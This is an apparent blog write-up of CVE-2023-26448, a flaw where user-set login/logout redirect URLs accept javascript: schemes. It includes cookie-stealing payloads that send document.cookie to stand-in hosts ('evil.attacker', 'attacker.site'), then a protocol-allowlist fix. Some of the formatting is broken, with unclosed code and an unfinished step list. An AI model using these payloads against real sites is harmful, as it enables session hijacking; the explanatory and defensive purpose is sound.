CVE-2023-26448 - Custom Log-in/Log-out Locations in jslob Expose Users to Malicious Redirects (Exclusive Deep Dive)

CVE-2023-26448 is an overlooked but serious security flaw affecting web applications that let users define custom log-in and log-out URLs, referred to internally as jslob locations. Improper validation in handling these user-defined locations means attackers could use malicious protocol handlers (like javascript: or data: URLs) to execute scripts in someone else's session.

In practical terms: exploiting this could allow an attacker to hijack user sessions or make victims unwittingly perform dangerous actions on the site via both the web interface and APIs. In this post, we break down how the vulnerability works, how it can be abused, and how it was finally fixed.

The Root of the Problem

The at-risk application stored user-supplied log-in and log-out redirect locations as arbitrary strings (jslob). However, it didn't check if those strings contained malicious protocol handlers. This gap let attackers sneak in URLs starting with javascript:, data:, or other dangerous schemes.

Suppose your app stores a JSON blob for user profile settings

{
  "custom_login_url": "javascript:alert('Hacked!')",
  "custom_logout_url": "https://trusted.site/logout";
}

If the app blindly redirects users to whatever's in custom_login_url, an attacker who can set this field—either through direct account access or by luring the victim into changing their settings—can execute unwanted scripts.

Step-by-Step Exploit

1. Preparation: The attacker needs temporary access to a target's account (for example, via phishing or device access) OR tricks the victim into using a compromised account (think: buying or sharing accounts).

`

javascript:fetch('https://evil.attacker/steal?cookie=' + document.cookie)

window.location.href = user.jslob.custom_login_url;

// Results in browser navigating to
// javascript:fetch('https://evil.attacker/steal?cookie=' + document.cookie)

Proof-of-Concept Exploit (Hypothetical)

// Unpatched code
const nextLocation = userDefinedSettings.custom_login_url;
window.location.href = nextLocation;

// If nextLocation is 'javascript:alert(document.cookie)'
// The cookie will be shown to the attacker

There are no public exploits reported as of June 2024, but crafting one is trivial for anyone with the necessary account access.

Exploitation Methods

- Session Hijacking: Steal session cookies using "javascript:fetch(...)" or "javascript:location='https://attacker.site/?cookie='+document.cookie";.
- CSRF/Lateral Movement: Trigger unwanted actions on behalf of the user.

After discovery, the team rolled out stricter checks for jslob content

- Allowed Protocols Only: Now, only http:// or https:// (and maybe mailto:) are accepted.

Safe Pattern Example

function sanitizeJsLobUrl(url) {
    const allowedProtocols = ['http:', 'https:'];
    try {
        const parsed = new URL(url);
        if (!allowedProtocols.includes(parsed.protocol)) {
            throw new Error('Disallowed protocol');
        }
        return parsed.href;
    } catch (e) {
        // Fall back to homepage or default page
        return '/dashboard';
    }
}

References & Further Reading

- NVD Entry for CVE-2023-26448
- OWASP Unvalidated Redirects and Forwards Cheat Sheet
- MDN: URL protocols

Conclusion

CVE-2023-26448 is a classic example of why user-supplied data should never be trusted for security-critical operations, especially redirects. With the patch now in place, only safe web addresses can be used as custom log-in or log-out locations. Administrators are strongly advised to audit any apps or plugins handling user-defined navigation settings.

If you operate or maintain a system with custom redirect capabilities, review your input validation today. Don’t wait for the next CVE in your logs!

Timeline

Published on: 08/02/2023 13:15:00 UTC
Last modified on: 08/07/2023 15:43:00 UTC